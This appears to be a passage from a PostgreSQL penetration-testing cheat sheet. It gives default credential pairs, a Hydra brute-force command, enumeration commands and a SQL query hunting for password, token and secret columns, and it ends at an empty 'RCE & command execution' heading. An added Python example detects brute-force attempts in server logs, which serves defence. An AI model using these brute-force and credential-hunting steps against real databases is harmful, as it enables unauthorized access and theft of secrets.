Connect & Basic Enum
psql -U <myuser> # Open psql console with user
psql -h <host> -U <username> -d <database> # Remote connection
psql -h <host> -p <port> -U <username> <database> # Remote connection, specifying the port
Default credentials:
postgres : postgres
postgres : password
postgres : admin
admin : admin
admin : password
Disable pager inside psql
\pset pager off
Bruteforce login
Hydra
hydra -L /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt -P /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt <IP> <DATABASE i.e postgres>
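Detecting this kind of password guessing on the server side, as an added example that is not part of the original cheat sheet. It assumes log_connections = on and the default log_line_prefix ('%m [%p] '), so the client host is taken from the "connection received" line with the same PID; the sample log, function names and threshold are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample log: default log_line_prefix ('%m [%p] '), log_connections = on.
SAMPLE_LOG = '''\
2024-05-01 10:00:01.101 UTC [4101] LOG:  connection received: host=203.0.113.7 port=51000
2024-05-01 10:00:01.110 UTC [4101] FATAL:  password authentication failed for user "postgres"
2024-05-01 10:00:01.301 UTC [4102] LOG:  connection received: host=203.0.113.7 port=51002
2024-05-01 10:00:01.310 UTC [4102] FATAL:  password authentication failed for user "postgres"
2024-05-01 10:00:01.501 UTC [4103] LOG:  connection received: host=203.0.113.7 port=51004
2024-05-01 10:00:01.510 UTC [4103] FATAL:  password authentication failed for user "postgres"
2024-05-01 10:00:01.701 UTC [4104] LOG:  connection received: host=203.0.113.7 port=51006
2024-05-01 10:00:01.710 UTC [4104] FATAL:  password authentication failed for user "admin"
2024-05-01 10:00:01.901 UTC [4105] LOG:  connection received: host=203.0.113.7 port=51008
2024-05-01 10:00:01.910 UTC [4105] FATAL:  password authentication failed for user "admin"
2024-05-01 10:03:10.000 UTC [4110] LOG:  connection received: host=198.51.100.20 port=40112
2024-05-01 10:03:10.015 UTC [4110] FATAL:  password authentication failed for user "appuser"
2024-05-01 10:03:15.000 UTC [4111] LOG:  connection received: host=198.51.100.20 port=40114
2024-05-01 10:03:15.012 UTC [4111] LOG:  connection authorized: user=appuser database=app
'''

CONN_RE = re.compile(r'\[(\d+)\] LOG:\s+connection received: host=(\S+)')
FAIL_RE = re.compile(r'\[(\d+)\] FATAL:\s+password authentication failed for user "([^"]+)"')

def failed_logins_by_host(log_text):
    """Return {client_host: {role: failure_count}} by joining log lines on backend PID."""
    pid_host = {}  # backend PID -> client host; overwritten when a PID is reused
    failures = defaultdict(lambda: defaultdict(int))
    for line in log_text.splitlines():
        m = CONN_RE.search(line)
        if m:
            pid_host[m.group(1)] = m.group(2)
            continue
        m = FAIL_RE.search(line)
        if m:
            # "unknown" covers failures whose connection line was rotated away
            failures[pid_host.get(m.group(1), "unknown")][m.group(2)] += 1
    return {host: dict(roles) for host, roles in failures.items()}

def flag_bruteforce(log_text, min_failures=5):
    """List (host, total_failures, roles_tried) for hosts at or above the threshold."""
    flagged = []
    for host, roles in sorted(failed_logins_by_host(log_text).items()):
        total = sum(roles.values())
        if total >= min_failures:
            flagged.append((host, total, sorted(roles)))
    return flagged
```

A single failure followed by a successful login (the second host in the sample) stays below the threshold, while repeated failures across several role names from one address are reported.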
Enumerate databases and tables
\list # List databases
\c <database> # Connect to the database
\d # List tables
Find sensitive columns
SELECT table_schema, table_name, column_name
FROM information_schema.columns
WHERE column_name LIKE '%password%'
   OR column_name LIKE '%pass%'
   OR column_name LIKE '%pwd%'
   OR column_name LIKE '%secret%'
   OR column_name LIKE '%token%'
   OR column_name LIKE '%key%'
   OR column_name LIKE '%auth%';
Show content of a table
SELECT *
FROM <table_name>
LIMIT 10;
Enumerate users and roles
\du+
RCE & command execution